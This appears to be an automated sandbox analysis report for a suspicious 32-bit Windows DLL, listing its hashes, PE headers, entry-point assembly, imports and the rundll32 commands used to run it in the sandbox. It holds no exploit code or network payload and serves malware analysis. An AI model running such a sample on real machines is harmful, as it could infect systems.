TLSH:386613186210C025F8864276F47851FE8064B93857E51AD7F7882A4D8FBD9E9EF3A733
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1}T:u.:iu.:iu.:ixN.ik.:ixN.i1.:ixN.i..:i...ix.:iu.;i..:i...is.:i...io.:i...it.:i...it.:iRichu.:i................PE..L.....>a...

File Icon

Icon Hash:7ae282899bbab082

Static PE Info

General

Entrypoint:0x10067d87
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:NX_COMPAT
Time Stamp:0x613E19C8 [Sun Sep 12 15:16:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:7cd74f7474e981fda0ae7dfc861e61cb

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F75C4DBF9B7h
call 00007F75C4DCB721h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F75C4DBF9BCh
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 10082DA8h
call 00007F75C4DC4CEFh
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007F75C4DBF9BEh
cmp dword ptr [11180280h], esi
je 00007F75C4DBFA9Ah
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007F75C4DBF9B7h
cmp esi, 02h
jne 00007F75C4DBF9E7h
mov ecx, dword ptr [10002718h]
test ecx, ecx
je 00007F75C4DBF9BEh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F75C4DBFA67h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F75C4DBF7C6h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F75C4DBFA50h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F75C4DCB736h
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007F75C4DBF9DAh
test edi, edi
jne 00007F75C4DBF9D6h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007F75C4DCB71Eh
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F75C4DBF78Ch
mov eax, dword ptr [10002718h]
test eax, eax
je 00007F75C4DBF9B9h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Rich Headers

Programming Language:
  • [ASM] VS2013 build 21005
  • [C++] VS2013 build 21005
  • [ C ] VS2013 build 21005
  • [C++] VS2013 UPD5 build 40629
  • [EXP] VS2013 UPD5 build 40629
  • [LNK] VS2013 UPD5 build 40629

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x833800x41.text
IMAGE_DIRECTORY_ENTRY_IMPORT0x11832bc0x8c.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x11850000x2f90.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7cb80x40.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x11830000x2bc.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x823c10x8240066301598685edbb3fd66c30e8b1db7daFalse0.4785399922024952data6.377564474165297IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data0x840000x10fe38c0x5ec0006f79645103290c185d5fcb439532d4d4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata0x11830000x11fc0x1200fa58ed40493dd2cb75a414c9cbc5d8a5False0.4676649305555556data5.690357837366671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x11850000x2f900x3000bd03a48314f3769efdd0abd3bfac8a0dFalse0.7286783854166666data6.540267631837761IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLLImport
KERNEL32.dllReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, GetModuleFileNameW, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetModuleFileNameA, GetFileType, GetStdHandle, GetOEMCP, GetACP, IsValidCodePage, SetFilePointerEx, GetSystemDefaultUILanguage, GetModuleHandleExW, ExitProcess, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, IsProcessorFeaturePresent, GetProcAddress, GetModuleHandleW, GetStartupInfoW, TlsFree, LoadLibraryExW, OutputDebugStringW, SetStdHandle, WriteConsoleW, ReadConsoleW, CreateFileW, SuspendThread, GetVersion, IsDebuggerPresent, GetThreadPriority, DeviceIoControl, VirtualAlloc, HeapDestroy, FormatMessageW, GetLogicalDrives, CreateDirectoryW, VerSetConditionMask, SystemTimeToTzSpecificLocalTime, GetProcessHeap, SetErrorMode, SystemTimeToFileTime, EnumResourceNamesW, GetFullPathNameW, EnumCalendarInfoW, lstrcpyW, GetExitCodeThread, SizeofResource, HeapSize, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, GetCurrentProcess, Sleep, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, GetStringTypeW, GetLastError, HeapReAlloc, GetSystemTimeAsFileTime, RaiseException, RtlUnwind, HeapFree, GetCommandLineA, GetCurrentThreadId, GetCPInfo, HeapAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount
USER32.dllShowOwnedPopups, DestroyWindow, SetCursor, GetDlgItemInt, SetTimer, SetKeyboardState, SetCapture, RemovePropA, GetClientRect, BeginPaint, WaitMessage, GetCapture, ShowCursor, OffsetRect, LoadMenuW, GetWindowLongW, UnregisterClassA, GetWindowLongA, GetWindowTextW, CreateMenu, SendDlgItemMessageW, GetSysColor, EnumChildWindows, AppendMenuA, GetMenuItemCount, GetKeyboardType, CheckRadioButton, GetSystemMetrics, EnableWindow, GetDlgCtrlID, GetDlgItemTextA, GetCaretBlinkTime, SetMenuItemInfoW, GetMonitorInfoW, RegisterClassA, EndPaint, RegisterWindowMessageW, DrawTextExW, GetMenu, GetSystemMenu, CharUpperBuffW, CreateDialogParamA, GetWindowTextLengthA, GetDoubleClickTime, GetDC, GetDesktopWindow, GetClassNameW
GDI32.dllGetTextExtentPoint32W, PatBlt, GetCharacterPlacementW, CreateFontIndirectA, SelectObject, CreateCompatibleDC, SaveDC, GetCurrentPositionEx, GetTextExtentExPointA, GetCharWidth32A, SetTextAlign, GetPixel, ExtTextOutA, CreateSolidBrush, SetBkColor, CreateBitmap, GetSystemPaletteEntries, BitBlt, CreateFontIndirectW, GdiFlush, SelectClipRgn, GetStockObject, ExtCreatePen
ADVAPI32.dllGetLengthSid, RegLoadKeyW, AllocateAndInitializeSid, QueryServiceStatus, RegQueryInfoKeyW, CopySid, OpenSCManagerW
SHELL32.dllExtractIconExW, SHGetFileInfoW
OLEAUT32.dllVariantChangeType, SysAllocStringLen, VariantInit

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Target ID:0
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe "C:\Users\user\Desktop\GqjUrFW.dll"
Imagebase:0x40000
File size:126'464 bytes
MD5 hash:51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:1
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:2
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:3
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1
Imagebase:0x5d0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:4
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Imagebase:0x5d0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:5
Start time:15:58:59
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Imagebase:0x5d0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Disassembly

No disassembly